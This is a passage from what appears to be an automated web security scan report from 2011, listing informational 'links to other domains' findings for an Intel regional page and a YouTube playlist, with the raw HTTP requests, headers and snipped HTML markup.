INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:32 GMT
Content-Length: 31194
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel Product Technologies</title>
<!-- DOC-FACTO
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.155. http://www.intel.com/vi_VN/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /vi_VN/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/vi_VN/index.htm?iid=gg_en_VN+noscript
The response contains the following link to another domain:
  • http://www.pcguide.vn/

Request

GET /vi_VN/index.htm?iid=gg_en_VN+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:23 GMT
Content-Length: 20446
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<meta http-equiv=Content-Type content="text/html; charset=utf-
...[SNIP]...
<li><a href="http://www.pcguide.vn" onclick="waCustomLink(this,'','o','wa_iid=home-vn+pcguide');" target="_blank"><strong>
...[SNIP]...

17.156. http://www.youtube.com/view_play_list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /view_play_list

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.youtube.com/view_play_list?p=698CFFD6A87A1ACB
The response contains the following links to other domains:
  • http://code.google.com/apis/youtube/overview.html
  • http://i1.ytimg.com/i/HJnltjgj0Y6xCxPzziHhHA/1.jpg?v=86bc88
  • http://i2.ytimg.com/vi/i73f0pQBfQ8/hqdefault.jpg
  • http://s.ytimg.com/yt/cssbin/www-browse-vflWOBo2b.css
  • http://s.ytimg.com/yt/cssbin/www-core-vflAcpcNK.css
  • http://s.ytimg.com/yt/cssbin/www-the-rest-vflgCq-F2.css
  • http://s.ytimg.com/yt/favicon-vflZlzSbU.ico
  • http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif
  • http://s.ytimg.com/yt/jsbin/www-browse-vflF9ViWz.js
  • http://s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js
  • http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&hl=en_US
  • http://www.google.com/support/youtube/bin/static.py?p=&page=start.cs&hl=en_US
  • http://www.google.com/tools/feedback/intl/en/error.html
  • https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252Fview_play_list%253Fp%253D698CFFD6A87A1ACB&ltmpl=sso&service=youtube&hl=en_US
  • https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252Fview_play_list%253Fp%253D698CFFD6A87A1ACB&hl=en_US&ltmpl=sso

Request

GET /view_play_list?p=698CFFD6A87A1ACB HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: sWkFSZzctYUFHdmlOMGhxMlFMMVN5MW1IdjdOMHczMERDcUtzQ0hPZ0FtVGp3eHVCM3hwUEFB -->
<head>


<title>
YouTube
- Broadcast Yourself.

...[SNIP]...
</title>

<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vflAcpcNK.css">


<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-the-rest-vflgCq-F2.css">

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-browse-vflWOBo2b.css">


<link rel="search" type="application/opensearchdescription+xml" href="http://www.youtube.com/opensearch?locale=en_US" title="YouTube Video Search">
<link rel="icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="shortcut icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="alternate" media="handheld" href="http://m.youtube.com/view_playlist?desktop_uri=%2Fview_play_list%3Fp%3D698CFFD6A87A1ACB&amp;p=698CFFD6A87A1ACB&amp;gl=US">
...[SNIP]...
<a href="/" title="YouTube home">
<img id="logo" class="master-sprite" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="YouTube home">
</a>
...[SNIP]...
</a>

<a class="start" href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252Fview_play_list%253Fp%253D698CFFD6A87A1ACB&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">Create Account</a><a class="end" href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252Fview_play_list%253Fp%253D698CFFD6A87A1ACB&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
<span class="img"><img alt="The image that represents this playlist." id="vpl-thumb-image" src="//i2.ytimg.com/vi/i73f0pQBfQ8/hqdefault.jpg" /></span>
...[SNIP]...
<a href="/user/intelnewsroom" >
<img src="http://i1.ytimg.com/i/HJnltjgj0Y6xCxPzziHhHA/1.jpg?v=86bc88" alt="intelnewsroom" title="intelnewsroom">
</a>
...[SNIP]...
return false;" title="Play all videos in this playlist" type="button" id="vpl-play-all-btn" class="master-sprite yt-uix-button yt-uix-button-primary yt-uix-tooltip" role="button" aria-pressed="false"><img class="yt-uix-button-icon-play" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
<button type="button" class="master-sprite start yt-uix-button yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
<button type="button" class="end yt-uix-button yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i2.ytimg.com/vi/i73f0pQBfQ8/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Intel Visual Life Invitation" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i3.ytimg.com/vi/ZM0ptMqNhso/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="The Chase Film" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i2.ytimg.com/vi/e5NgG5koPZU/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Intel Visual Life - The Sartorialist" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i3.ytimg.com/vi/v22X2q-8aGw/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Mooly Demonstrates 2nd Gen Intel Core processor Graphics Performance" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i3.ytimg.com/vi/ZNpim6cbPZ4/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Empowering Embedded with the 2nd Generation Intel.. Core... Processor Family" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i3.ytimg.com/vi/zBCO2mSXiN8/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Intel Atom-based Tablets at CES 2011" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i1.ytimg.com/vi/LJ8uAq8AC7E/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Ride the Netbook Carousel at CES 2011" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i4.ytimg.com/vi/s7wWNUZhRac/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Hands-on with the Intel Atom-based Chromebook" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i4.ytimg.com/vi/kIKt-c6Ui40/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Hands on with Intel Atom-based Tablets at CES 2011" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i3.ytimg.com/vi/fC7cI8fIfSI/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="The New Intel Core Family Brings Everyone Together!" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i2.ytimg.com/vi/9N79ra-v1Ak/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Visibly Smart -- The 2nd Generation Intel Core Processor Family (HD)" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i3.ytimg.com/vi/6sz3LkoMRVQ/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Doug Davis Announces Intel's First Configurable Processor" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i2.ytimg.com/vi/1tpl07-l-I0/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Altera Teams with Intel on Configurable Intel Atom-based Processor" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i3.ytimg.com/vi/JW5h-_I2P6c/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Intel Corporation Introduces New 120GB Intel X25-M Solid-State Drive" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i4.ytimg.com/vi/gpzM6Mask80/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Intel Cloud Computing 2015 Vision" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img data-thumb="//i4.ytimg.com/vi/_hNduZb4Yg0/default.jpg" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" class="" title="Intel Cloud Builders" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<li><a href="http://code.google.com/apis/youtube/overview.html">Developers</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/static.py?p=&amp;page=start.cs&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Help');">Help</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Safety');">Safety</a>
...[SNIP]...
<p class="footer-info">

<a href="http://www.google.com/tools/feedback/intl/en/error.html" onclick="return yt.www.feedback.start('en', {&quot;accept_language&quot;: &quot;en&quot;});" id="reportbug">Report a bug</a>
...[SNIP]...
<div id="quicklist-player-close"><img onclick="yt.www.navigation.expandPlayer();" class="master-sprite expand-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"><img onclick="yt.www.navigation.closePlayer();" class="master-sprite close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"></div>
...[SNIP]...
<div id="quicklist-notifications" style="display: none;" class="yt-alert yt-alert-success yt-alert-small yt-alert-naked yt-rounded">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="icon master-sprite" alt="Alert icon">

<div class="yt-alert-content">
...[SNIP]...
pe="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked start start-edge yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Previous video" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-prev" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end yt-uix-button" onclick=";return false;" id="quicklist-next-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-next" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
ist-play-button" type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Play videos" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-play" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
</span> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div style="display:none;" class="yt-uix-button-menu">
...[SNIP]...
aster-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-autoplay-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-autoplay" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
master-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-shuffle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-shuffle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end end-edge yt-uix-button" onclick=";return false;" id="quicklist-toggle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-toggle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
<button class="yt-uix-button quicklist-tray-button yt-uix-slider-prev" onclick="return false;"><img class="yt-uix-slider-prev-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Previous"></button><button class="yt-uix-button quicklist-tray-button yt-uix-slider-next" onclick="return false;"><img class="yt-uix-slider-next-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Next"></button>
...[SNIP]...
<li class="empty quicklist-help-message">Your queue is empty. Add videos to your queue using this button: <img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="addto-button-help"><br> or <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252Fview_play_list%253Fp%253D698CFFD6A87A1ACB&amp;hl=en_US&amp;ltmpl=sso">sign in</a>
...[SNIP]...
<div id="quicklist-loading"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Loading..."><span id="quicklist-loading-message">
...[SNIP]...
<span class="yt-uix-button-menu-item " onclick="">
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252Fview_play_list%253Fp%253D698CFFD6A87A1ACB&amp;hl=en_US&amp;ltmpl=sso">Sign in</a>
...[SNIP]...
<div id="postpage">

